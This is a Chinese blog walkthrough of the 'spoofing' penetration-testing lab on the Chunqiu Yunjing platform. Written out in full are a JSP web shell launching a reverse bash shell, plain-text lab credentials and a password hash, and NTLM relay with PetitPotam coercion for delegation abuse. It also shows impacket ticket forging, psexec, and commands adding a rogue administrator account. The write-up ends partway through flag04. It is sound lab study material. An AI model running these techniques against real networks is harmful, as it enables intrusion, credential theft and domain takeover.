<!DOCTYPE html><html lang="zh-CN" data-theme="light"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>春秋云境-spoofing | fault`s blog</title><noscript>开启JavaScript才能访问本站哦~</noscript><link rel="icon" href="https://q1.qlogo.cn/g?b=qq&amp;nk=2444073573&amp;s=4"><!-- index.css--><link rel="stylesheet" href="/css/index.css?v=2.1.11"><!-- inject head--><meta name="google-site-verification" content="KJW_VMmsowGylvXOZWEq8EKRpR5bw2NBC1Xz0jHSCS8"><link rel="canonical" href="http://fault123.github.io/2024/11/08/spoofing/"><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.7.1/css/all.min.css"><!-- aplayer--><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/aplayer/1.10.1/APlayer.min.css"><!-- swiper--><!-- fancybox ui--><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/fancyapps-ui/5.0.36/fancybox/fancybox.min.css"><!-- katex--><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/KaTeX/0.16.9/katex.min.css"><!-- Open Graph--><meta name="description" content="flag01 8080端口，猜测tomcat,扫一下目录 发现docs目录，进去看发现该tomcat版本存在文件读取，于是尝试攻击 发现有一个UploadServlet 然后使用文件包含反弹shell 1.jsp 12345678910&amp;lt;% java.io.InputStream"><!-- pwa--><meta name="apple-mobile-web-app-capable" content="fault`s blog"><meta name="theme-color" content="var(--efu-main)"><meta name="apple-mobile-web-app-status-bar-style" content="var(--efu-main)"><link rel="bookmark" href="https://q1.qlogo.cn/g?b=qq&amp;nk=2444073573&amp;s=4"><link rel="apple-touch-icon" href="https://q1.qlogo.cn/g?b=qq&amp;nk=2444073573&amp;s=4" sizes="180x180"><script>console.log(' %c Solitude %c ' + '2.1.11' + ' %c https://github.com/everfu/hexo-theme-solitude',
    'background:#35495e ; padding: 1px; border-radius: 3px 0 0 3px;  color: #fff',
    'background:#ff9a9a ; padding: 1px; border-radius: 0 3px 3px 0;  color: #fff',
    'background:unset ; padding: 1px; border-radius: 0 3px 3px 0;  color: #fff')
</script><script>let mdate = "7-7,9-18,12-13";
mdate = (mdate.split(","));
let ndate = new Date();
for (let i of mdate) {
    if (i === (ndate.getMonth()+1) + "-" + (ndate.getDate())) {
        document.documentElement.classList.add('memorial');
    }
}
</script><script>(()=>{
        const saveToLocal = {
            set: function setWithExpiry(key, value, ttl) {
                if (ttl === 0)
                    return
                const now = new Date()
                const expiryDay = ttl * 86400000
                const item = {
                    value: value,
                    expiry: now.getTime() + expiryDay
                }
                localStorage.setItem(key, JSON.stringify(item))
            },
            get: function getWithExpiry(key) {
                const itemStr = localStorage.getItem(key)

                if (!itemStr) {
                    return undefined
                }
                const item = JSON.parse(itemStr)
                const now = new Date()

                if (now.getTime() > item.expiry) {
                    localStorage.removeItem(key)
                    return undefined
                }
                return item.value
            }
        };
        window.utils = {
            saveToLocal: saveToLocal,
            getCSS: (url, id = false) => new Promise((resolve, reject) => {
              const link = document.createElement('link')
              link.rel = 'stylesheet'
              link.href = url
              if (id) link.id = id
              link.onerror = reject
              link.onload = link.onreadystatechange = function() {
                const loadState = this.readyState
                if (loadState && loadState !== 'loaded' && loadState !== 'complete') return
                link.onload = link.onreadystatechange = null
                resolve()
              }
              document.head.appendChild(link)
            }),
            getScript: (url, attr = {}) => new Promise((resolve, reject) => {
              const script = document.createElement('script')
              script.src = url
              script.async = true
              script.onerror = reject
              script.onload = script.onreadystatechange = function() {
                const loadState = this.readyState
                if (loadState && loadState !== 'loaded' && loadState !== 'complete') return
                script.onload = script.onreadystatechange = null
                resolve()
              }

              Object.keys(attr).forEach(key => {
                script.setAttribute(key, attr[key])
              })

              document.head.appendChild(script)
            }),
            addGlobalFn: (key, fn, name = false, parent = window) => {
                const globalFn = parent.globalFn || {}
                const keyObj = globalFn[key] || {}

                if (name && keyObj[name]) return

                name = name || Object.keys(keyObj).length
                keyObj[name] = fn
                globalFn[key] = keyObj
                parent.globalFn = globalFn
            },
            addEventListenerPjax: (ele, event, fn, option = false) => {
              ele.addEventListener(event, fn, option)
              utils.addGlobalFn('pjax', () => {
                  ele.removeEventListener(event, fn, option)
              })
          },
        }
    })()</script><!-- theme--><script>initTheme = () => {
    let isDarkMode = window.matchMedia('(prefers-color-scheme: dark)').matches
    const cachedMode = utils.saveToLocal.get('theme');
    if (cachedMode === undefined) {
        const nowMode =
            isDarkMode ? 'dark' : 'light'
        document.documentElement.setAttribute('data-theme', nowMode);
    } else {
        document.documentElement.setAttribute('data-theme', cachedMode);
    }
    typeof rm === 'object' && rm.mode(cachedMode === 'dark' && isDarkMode)
}
initTheme()</script><!-- global head--><script>const GLOBAL_CONFIG = {
    root: '/',
    algolia: undefined,
    localsearch: undefined,
    runtime: '2023-04-20 00:00:00',
    lazyload: {
        enable: true,
        error: '/img/error_load.avif'
    },
    copyright: {"limit":1,"author":"作者: fault_li","link":"链接: ","source":"来源: fault`s blog","info":"著作权归作者所有。 商业转载请联系作者获得授权，非商业转载请注明出处。"},
    highlight: {"limit":200,"expand":true,"copy":true,"syntax":"highlight.js"},
    randomlink: false,
    lang: {"theme":{"dark":"已切换至深色模式","light":"已切换至浅色模式"},"copy":{"success":"复制成功","error":"复制失败"},"backtop":"返回顶部","time":{"day":"天前","hour":"小时前","just":"刚刚","min":"分钟前","month":"个月前"},"day":" 天","f12":"开发者模式已打开，请遵循GPL协议。","totalk":"无需删除空行，直接输入评论即可"},
    aside: {
        sayhello: {
            morning: "✨ 美好的一天开启啦",
            noon: "吃得香才能吃得香（确信）",
            afternoon: "是fault的午睡和游戏时间~",
            night: "努力学习ing...",
            goodnight: "碎觉碎觉 😴",
        },
        sayhello2: ["You'll make it.","You're gonna make it.","Good luck, stranger."],
        sayhello3: {
            prefix: '好久不见，',
            back: '欢迎再次回来，',
        },
    },
    covercolor: {
        enable: false
    },
    comment: false,
    lightbox: 'fancybox',
    post_ai: false,
    right_menu: {"mode":{"dark":"深色模式","light":"浅色模式"},"img_error":"此图片无法复制与下载","translate":{"enable":false,"defaultEncoding":2,"translateDelay":0}},
    translate: {"translateDelay":0,"defaultEncoding":2},
    lure: {"jump":"404 Not Found","back":"ヾ(≧∇≦*)ゝ嘿嘿，骗到你啦."},
    expire: {"time":30,"position":"top","text_prev":"This article expired ","text_next":" day ago, if the content does not match, please contact the webmaster to update it."},
};</script><!-- page-config head--><script id="config-diff">var PAGE_CONFIG = {
    is_post: true,
    is_page: false,
    is_home: false,
    page: '',
    toc: true,
    comment: true,
    ai_text: false,
    color: false,
}</script><meta name="generator" content="Hexo 7.2.0"><link rel="alternate" href="/atom.xml" title="fault`s blog" type="application/atom+xml">
</head><body id="body"><!-- universe--><canvas id="universe"></canvas><!-- background img--><!-- loading--><!-- console--><div id="console"><div class="close-btn" onclick="sco.hideConsole()"><i class="solitude fa-solid fa-xmark"></i></div><div class="console-card-group"><div class="console-card-group-left"><div class="console-card" id="card-newest-comments" onclick="sco.hideConsole()"><div class="card-content"><div class="author-content-item-tips">互动</div><div class="author-content-item-title">最新评论<a class="recent-comment-more" href="/recentcomments/" title="最近评论"><i class="solitude fa-solid fa-circle-chevron-right"></i></a></div></div><div class="console_recentcomments"><script pjax>(async () => {
    document.querySelector('.console-card .console_recentcomments').textContent = `加载中...`
    const emojiReg = /:[a-z0-9_\u4e00-\u9fa5]+:/g
    let cache = utils.saveToLocal.get('valine-recent-comments-console')
    if (cache) {
        setHtml(document.querySelector('.console-card .console_recentcomments'), cache)
        return
    }
    let ls = []
    if (typeof md5 === "undefined") await utils.getScript('https://cdnjs.cloudflare.com/ajax/libs/blueimp-md5/2.19.0/js/md5.min.js')
    await fetch('https://f9qjcm7t.api.lncldglobal.com/1.1/classes/Comment?limit=8&order=-createdAt', {
        method: "GET",
        headers: {
            "X-LC-Id": 'F9QjCm7TBr6LB35r0IAJieDQ-MdYXbMMI',
            "X-LC-Key": 'sxYlPHL77ssMvSMC8a9bHzx6',
            "Content-Type": "application/json"
        }
    }).then(async res => res.json()).then(async results => {
        for (const i of results.results) {
            let title = ''
            if (i.url) {
                await fetch(i.url).then(res => res.text()).then(html => {
                    const parser = new DOMParser()
                    const doc = parser.parseFromString(html, 'text/html')
                    title = doc.querySelector('title').innerText
                }).catch(() => {
                    title = i.url
                })
            }
            if (title.indexOf('|') > 0) {
                title = title.split('|')[0]
            }
            ls.push({
                title: title,
                url: i.url,
                nick: i.nick,
                avatar: '' + '/avatar/' + md5(i.mail.trim().toLowerCase()),
                time: i.createdAt,
                content: formatContent(i.comment)
            })
        }
        setHtml(document.querySelector('.console-card .console_recentcomments'), ls)
        utils.saveToLocal.set('valine-recent-comments-console', ls, 0.2)
    })

    function setHtml(el, data) {
        el.innerHTML = data.map(i => `
                    <div class="comment-card" title="${i.title}" onclick="pjax.loadUrl('${i.url}')">
                        <div class="comment-info">
                            <img src="${i.avatar}" class="nolazyload" alt="${i.nick}">
                            <div>
                                <span class="comment-user">${i.nick}</span>
                            </div>
                            <time class="comment-time" datetime="${i.time}"></time>
                        </div>
                        <div class="comment-content">${i.content}</div>
                        <div class="comment-title">
                        <i class="solitude fa-solid fa-comment"></i>
                        ${i.title}</div>
                    </div>
                `).join('')
        if (typeof sco !== 'undefined') sco.changeTimeFormat(document.querySelectorAll('.comment-time'))
        else {
            document.addEventListener('pjax:complete', () => sco.changeTimeFormat(document.querySelectorAll('.comment-time')))
            document.addEventListener('DOMContentLoaded', () => sco.changeTimeFormat(document.querySelectorAll('.comment-time')))
        }
    }

    function formatContent(content) {
        content = content.replace(emojiReg, '[表情]')
        content = content.replace(/!\[.*?\]\((.*?)\)/g, '[图片]')
        content = content.replace(/\[.*?\]\((.*?)\)/g, '[链接]')
        content = content.replace(/```.*?```/g, '[代码]')
        return content
    }
})()</script></div></div></div><div class="console-card-group-right"><div class="console-card tags" onclick="sco.hideConsole()"><div class="card-content"><div class="author-content-item-tips">标签</div><div class="author-content-item-title">寻找感兴趣的领域</div></div><div class="card-tag-cloud"><a href="/tags/%E5%B9%B4%E7%BB%88%E6%80%BB%E7%BB%93/">年终总结<sup>1</sup></a><a href="/tags/%E6%80%BB%E7%BB%93/">总结<sup>1</sup></a><a href="/tags/%E6%AF%94%E8%B5%9Bwp/">比赛wp<sup>4</sup></a><a href="/tags/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/">渗透测试<sup>4</sup></a><a href="/tags/Web/">Web<sup>2</sup></a><a href="/tags/Java%E5%90%84%E7%A7%8D%E6%B3%A8%E5%85%A5/">Java各种注入<sup>1</sup></a><a href="/tags/Java/">Java<sup>10</sup></a><a href="/tags/%E6%98%A5%E7%A7%8B%E4%BA%91%E5%A2%83/">春秋云境<sup>3</sup></a><a href="/tags/%E5%9F%9F%E7%9B%B8%E5%85%B3/">域相关<sup>4</sup></a><a href="/tags/IOT/">IOT<sup>1</sup></a><a href="/tags/%E6%97%A5%E5%B8%B8/">日常<sup>1</sup></a><a href="/tags/Crypto/">Crypto<sup>2</sup></a></div></div><div class="console-card history" onclick="sco.hideConsole()"><ul class="card-archive-list"><li class="card-archive-list-item"><a class="card-archive-list-link" href="/archives/2024/12/"><span class="card-archive-list-date">2024/12</span><div class="card-archive-list-count-group"><span class="card-archive-list-count">1</span><span class="card-archive-list-count-unit">篇</span></div></a></li><li class="card-archive-list-item"><a class="card-archive-list-link" href="/archives/2024/11/"><span class="card-archive-list-date">2024/11</span><div class="card-archive-list-count-group"><span class="card-archive-list-count">3</span><span class="card-archive-list-count-unit">篇</span></div></a></li><li class="card-archive-list-item"><a class="card-archive-list-link" href="/archives/2024/10/"><span class="card-archive-list-date">2024/10</span><div class="card-archive-list-count-group"><span class="card-archive-list-count">1</span><span class="card-archive-list-count-unit">篇</span></div></a></li><li class="card-archive-list-item"><a class="card-archive-list-link" href="/archives/2024/09/"><span class="card-archive-list-date">2024/09</span><div class="card-archive-list-count-group"><span class="card-archive-list-count">1</span><span class="card-archive-list-count-unit">篇</span></div></a></li><li class="card-archive-list-item"><a class="card-archive-list-link" href="/archives/2024/08/"><span class="card-archive-list-date">2024/08</span><div class="card-archive-list-count-group"><span class="card-archive-list-count">3</span><span class="card-archive-list-count-unit">篇</span></div></a></li><li class="card-archive-list-item"><a class="card-archive-list-link" href="/archives/2024/07/"><span class="card-archive-list-date">2024/07</span><div class="card-archive-list-count-group"><span class="card-archive-list-count">3</span><span class="card-archive-list-count-unit">篇</span></div></a></li><li class="card-archive-list-item"><a class="card-archive-list-link" href="/archives/2024/03/"><span class="card-archive-list-date">2024/03</span><div class="card-archive-list-count-group"><span class="card-archive-list-count">13</span><span class="card-archive-list-count-unit">篇</span></div></a></li><li class="card-archive-list-item"><a class="card-archive-list-link" href="/archives/2024/02/"><span class="card-archive-list-date">2024/02</span><div class="card-archive-list-count-group"><span class="card-archive-list-count">1</span><span class="card-archive-list-count-unit">篇</span></div></a></li><li class="card-archive-list-item"><a class="card-archive-list-link" href="/archives/2023/01/"><span class="card-archive-list-date">2023/01</span><div class="card-archive-list-count-group"><span class="card-archive-list-count">1</span><span class="card-archive-list-count-unit">篇</span></div></a></li><li class="card-archive-list-item"><a class="card-archive-list-link" href="/archives/"><span class="card-archive-list-date">全部文章</span><div class="card-archive-list-count-group"><span class="card-archive-list-count">27</span><span class="card-archive-list-count-unit">篇</span></div></a></li></ul></div></div></div><div class="button-group"><div class="console-btn-item"><span class="darkmode_switchbutton" onclick="sco.switchDarkMode()" title="昼夜切换"><i class="solitude fa-solid fa-circle-half-stroke"></i></span></div><div class="console-btn-item" id="consoleHideAside"><span class="asideSwitch" onclick="sco.switchHideAside()" title="边栏显示控制"><i class="solitude fas fa-arrows-left-right-to-line"></i></span></div></div><div class="console-mask" onclick="sco.hideConsole()"></div></div><!-- sidebar--><div id="sidebar" style="zoom: 1;"><div id="menu-mask" style="display: none;"></div><div id="sidebar-menus"><div class="site-data"><div class="data-item is-center"><div class="data-item-link"><a href="/archives/"><div class="headline">文章</div><div class="length-num">27</div></a></div></div><div class="data-item is-center"><div class="data-item-link"><a href="/categories/"><div class="headline">分类</div><div class="length-num">0</div></a></div></div><div class="data-item is-center"><div class="data-item-link"><a href="/tags/"><div class="headline">标签</div><div class="length-num">12</div></a></div></div></div><span class="sidebar-menu-item-title">功能</span><div class="sidebar-menu-item"><span class="darkmode_switchbutton menu-child" onclick="sco.switchDarkMode()"><i class="solitude fa-solid fa-circle-half-stroke"></i><span>显示模式</span></span></div><div class="menus_items"><div class="menus_item"><a class="site-page" href="/"><span>Home</span></a></div><div class="menus_item"><a class="site-page" href="javascript:void(0);"><span>Article</span></a><ul class="menus_item_child"><li><a class="site-page child" href="/archives/"><i class="solitude  fas fa-folder-closed"></i><span>Archives</span></a></li><li><a class="site-page child" href="/tags/"><i class="solitude  fas fa-tags"></i><span>Tags</span></a></li></ul></div><div class="menus_item"><a class="site-page" href="javascript:void(0);"><span>Friends</span></a><ul class="menus_item_child"><li><a class="site-page child" href="/links/"><i class="solitude  fas fa-user-group"></i><span>Links</span></a></li></ul></div><div class="menus_item"><a class="site-page" href="/about/"><span>About</span></a></div></div><span class="sidebar-menu-item-title">标签</span><div class="card-widget card-tags card-archives card-webinfo card-allinfo"><div class="card-tag-cloud"><a href="/tags/%E5%B9%B4%E7%BB%88%E6%80%BB%E7%BB%93/">年终总结<sup>1</sup></a><a href="/tags/%E6%80%BB%E7%BB%93/">总结<sup>1</sup></a><a href="/tags/%E6%AF%94%E8%B5%9Bwp/">比赛wp<sup>4</sup></a><a href="/tags/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/">渗透测试<sup>4</sup></a><a href="/tags/Web/">Web<sup>2</sup></a><a href="/tags/Java%E5%90%84%E7%A7%8D%E6%B3%A8%E5%85%A5/">Java各种注入<sup>1</sup></a><a href="/tags/Java/">Java<sup>10</sup></a><a href="/tags/%E6%98%A5%E7%A7%8B%E4%BA%91%E5%A2%83/">春秋云境<sup>3</sup></a><a href="/tags/%E5%9F%9F%E7%9B%B8%E5%85%B3/">域相关<sup>4</sup></a><a href="/tags/IOT/">IOT<sup>1</sup></a><a href="/tags/%E6%97%A5%E5%B8%B8/">日常<sup>1</sup></a><a href="/tags/Crypto/">Crypto<sup>2</sup></a></div></div><span class="sidebar-menu-item-title">网站信息</span><div class="webinfo"><div class="webinfo-item"><div class="webinfo-item-title"><i class="item-icon solitude fa-solid fa-file-word"></i><div class="item-name">全站字数 :</div></div><div class="item-count">37.6k</div></div></div></div></div><!-- keyboard--><!-- righhtside--><div class="post" id="body-wrap"><header class="post-bg" id="page-header"><nav class="show" id="nav"><div id="nav-group"><div id="blog_name"><a id="site-name" href="/" title="返回博客主页"><span class="title">fault</span><i class="solitude fa-solid fa-home"></i></a></div><div id="page-name-mask"><div id="page-name"><a id="page-name-text" onclick="sco.toTop()">春秋云境-spoofing</a></div></div><div id="menus"><div class="menus_items"><div class="menus_item"><a class="site-page" href="/"><span>Home</span></a></div><div class="menus_item"><a class="site-page" href="javascript:void(0);"><span>Article</span></a><ul class="menus_item_child"><li><a class="site-page child" href="/archives/"><i class="solitude  fas fa-folder-closed"></i><span>Archives</span></a></li><li><a class="site-page child" href="/tags/"><i class="solitude  fas fa-tags"></i><span>Tags</span></a></li></ul></div><div class="menus_item"><a class="site-page" href="javascript:void(0);"><span>Friends</span></a><ul class="menus_item_child"><li><a class="site-page child" href="/links/"><i class="solitude  fas fa-user-group"></i><span>Links</span></a></li></ul></div><div class="menus_item"><a class="site-page" href="/about/"><span>About</span></a></div></div></div><div id="nav-left"></div><div id="nav-right"><div class="nav-button" id="travellings_button"><a class="site-page" target="_blank" rel="noopener" href="https://www.travellings.cn/go.html" title=""><i class="solitude fas fa-train"></i></a></div><div class="nav-button" id="randomPost_button"><a class="site-page" onclick="toRandomPost()" title="随机一篇文章" href="javascript:void(0);"><i class="solitude fa-solid fa-dice-d6"></i></a></div><div class="nav-button" id="nav-console"><a class="console_switchbutton" onclick="sco.showConsole()" title="中控台" href="javascript:void(0);"><label><i class="left"></i><i class="center"></i><i class="right"></i></label></a></div><div class="nav-button" id="nav-totop" onclick="sco.toTop()"><a class="totopbtn"><i class="solitude fa-solid fa-arrow-up"></i><span id="percent">0</span></a></div><div id="toggle-menu"><a class="site-page"><i class="solitude fa-solid fa-bars"></i></a></div></div></div></nav><div class="coverdiv" id="coverdiv"><img class="nolazyload" id="post-cover" src="https://img.loliapi.cn/i/pc/img374.webp" alt="春秋云境-spoofing"></div><div id="post-info"><div id="post-firstinfo"><div class="meta-firstline"><a class="post-meta-original" title="该文章为原创文章，注意版权协议">原创</a><div class="tag_share"><div class="post-meta__tag-list"><a class="post-meta__tags" href="/tags/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/"><span class="tags-name tags-punctuation"><i class="solitude fa-solid fa-hashtag"></i>渗透测试</span></a><a class="post-meta__tags" href="/tags/%E6%98%A5%E7%A7%8B%E4%BA%91%E5%A2%83/"><span class="tags-name tags-punctuation"><i class="solitude fa-solid fa-hashtag"></i>春秋云境</span></a><a class="post-meta__tags" href="/tags/%E5%9F%9F%E7%9B%B8%E5%85%B3/"><span class="tags-name tags-punctuation"><i class="solitude fa-solid fa-hashtag"></i>域相关</span></a></div></div></div></div><h1 class="post-title">春秋云境-spoofing</h1><div id="post-meta"><div class="meta-secondline"><span class="post-meta-date" title="发布于 2024-11-08 00:00:00"><i class="post-meta-icon solitude fas fa-calendar-days"></i><time datetime="2024-11-07T16:00:00.000Z">2024-11-07T16:00:00.000Z</time></span><span class="post-meta-date" title="最后更新于 2024-11-08 20:55:10"><i class="post-meta-icon solitude fa-solid fa-arrows-rotate"></i><time datetime="2024-11-08T12:55:10.651Z">2024-11-08T12:55:10.651Z</time></span><span class="post-meta-wordcount"><i class="post-meta-icon solitude fa-solid fa-file-word" title="文章字数"></i><span class="word-count">1.5k</span><span class="post-meta-separator"></span><i class="post-meta-icon solitude fa-solid fa-clock" title="阅读耗时"></i><span>6 min</span></span><span class="post-meta-position" title="作者IP归属地为China"><i class="post-meta-icon solitude fas fa-location-dot"></i><span>China</span></span><a class="post-meta-pv" href="/2024/11/08/spoofing/" title="文章热度"><i class="post-meta-icon solitude fa-solid fa-fire-flame-curved"></i><span id="busuanzi_value_page_pv"><i class="solitude fa-solid fa-spinner fa-spin"></i></span></a><span class="post-meta-commentcount" title="评论数" onclick="sco.scrollTo('post-comment')"><i class="solitude fa-solid fa-comment"></i><a href="/2024/11/08/spoofing/#post-comment"><span class="valine-comment-count" data-xid="/2024/11/08/spoofing/" itemprop="commentCount"><i class="solitude fa-solid fa-spinner fa-spin"></i></span></a></span></div></div></div><section class="main-hero-waves-area waves-area"><svg class="waves-svg" xmlns="http://www.w3.org/2000/svg" xlink="http://www.w3.org/1999/xlink" viewBox="0 24 150 28" preserveAspectRatio="none" shape-rendering="auto"><defs><path id="gentle-wave" d="M -160 44 c 30 0 58 -18 88 -18 s 58 18 88 18 s 58 -18 88 -18 s 58 18 88 18 v 44 h -352 Z"></path></defs><g class="parallax"><use href="#gentle-wave" x="48" y="0"></use><use href="#gentle-wave" x="48" y="3"></use><use href="#gentle-wave" x="48" y="5"></use><use href="#gentle-wave" x="48" y="7"></use></g></svg></section></header><main class="layout" id="content-inner"><div id="post"><article class="post-content article-container"><h2 id="flag01"><a class="headerlink" href="#flag01"></a>flag01</h2>
<p>8080端口，猜测tomcat,扫一下目录<br>
发现docs目录，进去看发现该tomcat版本存在文件读取，于是尝试攻击<br>
<img src= "/img/loading.avif" data-lazy-src="https://fault-1315577519.cos.ap-nanjing.myqcloud.com/images/202411081232907.png" alt="image.png" loading="lazy"><br>
发现有一个UploadServlet<br>
<img src= "/img/loading.avif" data-lazy-src="https://fault-1315577519.cos.ap-nanjing.myqcloud.com/images/202411081233552.png" alt="image.png" loading="lazy"><br>
然后使用文件包含反弹shell<br>
<img src= "/img/loading.avif" data-lazy-src="https://fault-1315577519.cos.ap-nanjing.myqcloud.com/images/202411081236026.png" alt="image.png" loading="lazy"><br>
1.jsp</p>
<figure class="highlight jsp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">&lt;%</span><br><span class="line">    java.io.<span class="type">InputStream</span> <span class="variable">in</span> <span class="operator">=</span> Runtime.getRuntime().exec(<span class="string">&quot;bash -c &#123;echo,base64&#125;|&#123;base64,-d&#125;|&#123;bash,-i&#125;&quot;</span>).getInputStream();</span><br><span class="line">    <span class="type">int</span> <span class="variable">a</span> <span class="operator">=</span> -<span class="number">1</span>;</span><br><span class="line">    <span class="type">byte</span>[] b = <span class="keyword">new</span> <span class="title class_">byte</span>[<span class="number">2048</span>];</span><br><span class="line">    out.print(<span class="string">&quot;&lt;pre&gt;&quot;</span>);</span><br><span class="line">    <span class="keyword">while</span>((a=in.read(b))!=-<span class="number">1</span>)&#123;</span><br><span class="line">        out.println(<span class="keyword">new</span> <span class="title class_">String</span>(b));</span><br><span class="line">    &#125;</span><br><span class="line">    out.print(<span class="string">&quot;&lt;/pre&gt;&quot;</span>);</span><br><span class="line">%&gt;</span><br></pre></td></tr></table></figure>
<p><img src= "/img/loading.avif" data-lazy-src="https://fault-1315577519.cos.ap-nanjing.myqcloud.com/images/202411081237711.png" alt="image.png" loading="lazy"></p>
<p>然后我们传入后读取flag<br>
<img src= "/img/loading.avif" data-lazy-src="https://fault-1315577519.cos.ap-nanjing.myqcloud.com/images/202411081238939.png" alt="image.png" loading="lazy"><br>
然后我们从自己vps中下载fscan和chisel</p>
<h2 id="flag02"><a class="headerlink" href="#flag02"></a>flag02</h2>
<p>下载好后扫描，看看扫描个什么出来，然后我们在自己vps中起chisel<br>
<img src= "/img/loading.avif" data-lazy-src="https://fault-1315577519.cos.ap-nanjing.myqcloud.com/images/202411081248982.png" alt="image.png" loading="lazy"><br>
发现了经典ms17_010<br>
我们kali启动<br>
在一边启动kali时候我们启动chisel将内网映射到我们的vps中，然后这样直接设置rhost就可以，不用走socks了<br>
<img src= "/img/loading.avif" data-lazy-src="https://fault-1315577519.cos.ap-nanjing.myqcloud.com/images/202411081319197.png" alt="image.png" loading="lazy"><br>
emmmm还是别学我，因为里面服务很多，而且没有web服务，走socks会方便很多</p>
<h2 id="flag03"><a class="headerlink" href="#flag03"></a>flag03</h2>
<p>然后我们抓到用户凭据<br>
<img src= "/img/loading.avif" data-lazy-src="https://fault-1315577519.cos.ap-nanjing.myqcloud.com/images/202411081320514.png" alt="image.png" loading="lazy"></p>
<p>然后我们发现在26这台机子上有webdav<br>
<img src= "/img/loading.avif" data-lazy-src="https://fault-1315577519.cos.ap-nanjing.myqcloud.com/images/202411081326955.png" alt="image.png" loading="lazy"></p>
<p><img src= "/img/loading.avif" data-lazy-src="https://fault-1315577519.cos.ap-nanjing.myqcloud.com/images/202411081327223.png" alt="image.png" loading="lazy"><br>
也存在PetitPotam</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">proxychains ./cme smb 172.22.11.0/24 -u yangmei -p xrihGHgoNZQ -M webdav </span><br><span class="line">proxychains ./cme smb 172.22.11.0/24 -u yangmei -p xrihGHgoNZQ -M petitpotam</span><br></pre></td></tr></table></figure>
<p>所以我们可以尝试走强制认证<br>
于是我们先把kali的ssh publickey写到我们控制了的45机器中，然后直接连接<br>
但是我们需要使用PetitPotam和NTLM-Relay打强制认证，那么我们还是需要将流量转发到本机上，这样才能联动NTLM-Relay和PetitPltam</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">ssh -i id_rsa root@39.98.116.245 -D socks代理:PORT -R \*:79:127.0.0.1:80</span><br><span class="line">nohup socat TCP-LISTEN:80,fork,bind=0.0.0.0 TCP:localhost:79 &amp;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">proxychains python3 ntlmrelayx.py -t ldap://172.22.11.6 --no-dump --no-da --no-acl --escalate-user &#x27;xr-desktop$&#x27; --delegate-access</span><br><span class="line">proxychains python3 PetitPotam.py -u yangmei -p &#x27;xrihGHgoNZQ&#x27; -d xiaorang.lab ubuntu@80/pwn.txt 172.22.11.26</span><br></pre></td></tr></table></figure>
<blockquote>
<p>其实这里我对这个代理转发纠结了好久为什么这样才能让45的流量转发到本地<br>
这里需要解决的一点就是0.0.0.0和127.0.0.1的区别<br>
0.0.0.0是所有外部都可以访问的地址，但是127.0.0.1只能内网中访问，但是如果你直接设置ssh反向端口转发的话只会监听127.0.0.1，没有办法监听到外部访问80端口的流量，于是这里需要让一个所有外部都可以访问的0.0.0.0地址的80流量转发到127.0.0.1的79端口然后再将79端口的流量转到本机的80端口，让自己127.0.0.1的80端口监听0.0.0.0:80端口流量，从而实现这俩的联动实现强制认证</p>
</blockquote>
<blockquote>
<p>以及这里为什么ldap后面要用DC的ip，是因为在域中，DC是负责处理LDAP请求的服务器<br>
还有为什么用XR-Desktop作为恶意机器账户来设置RBCD，这包的，如果你不理解这句话，建议重新学一下RBCD</p>
</blockquote>
<blockquote>
<p>然后我们使用PetitPotam触发XR-LCM3AE8B 认证到172.22.11.76，到这里我们已经强制认证成功了</p>
</blockquote>
<p><img src= "/img/loading.avif" data-lazy-src="https://fault-1315577519.cos.ap-nanjing.myqcloud.com/images/202411081904434.png" alt="image.png" loading="lazy"><br>
然后我们强制认证成功<br>
<img src= "/img/loading.avif" data-lazy-src="https://fault-1315577519.cos.ap-nanjing.myqcloud.com/images/202411081905280.png" alt="image.png" loading="lazy"><br>
之后我们就可以直接申请XR-LCM3AE8B的ST了，然后用我们的银票去打</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta prompt_">#</span><span class="language-bash">这里我的<span class="built_in">hash</span>和上面截图抓到的不一样是因为我中间关了一次靶机，所以这里如果想存payload建议换成自己抓到的</span></span><br><span class="line">proxychains impacket-getST -spn cifs/XR-LCM3AE8B.xiaorang.lab -impersonate administrator -hashes :e96835c0dc9ba2112731814cda166c5a  xiaorang.lab/XR-Desktop\$ -dc-ip 172.22.11.6</span><br><span class="line">export KRB5CCNAME=administrator.ccache</span><br><span class="line">proxychains python3 psexec.py xiaorang.lab/administrator@XR-LCM3AE8B.xiaorang.lab -k -no-pass -target-ip 172.22.11.26 -codec gbk</span><br></pre></td></tr></table></figure>
<p>然后我们拿到flag03<br>
<img src= "/img/loading.avif" data-lazy-src="https://fault-1315577519.cos.ap-nanjing.myqcloud.com/images/202411081909697.png" alt="image.png" loading="lazy"></p>
<h2 id="flag04"><a class="headerlink" href="#flag04"></a>flag04</h2>
<p>然后我们的想法是在这台机子里抓hash，那么我们先添加一个adminstrator用户</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">net user fault 123456. /add</span><br><span class="line">net localgroup administrators fault /add</span><br></pre></td></tr></table></figure>
<p>之后我们使用rdesktop登录上去，但是到这里我被一点卡住了，就是怎么传mimikatz上去，所以去找了发现可以使用smbclient去传，于是就出现了这个</p>
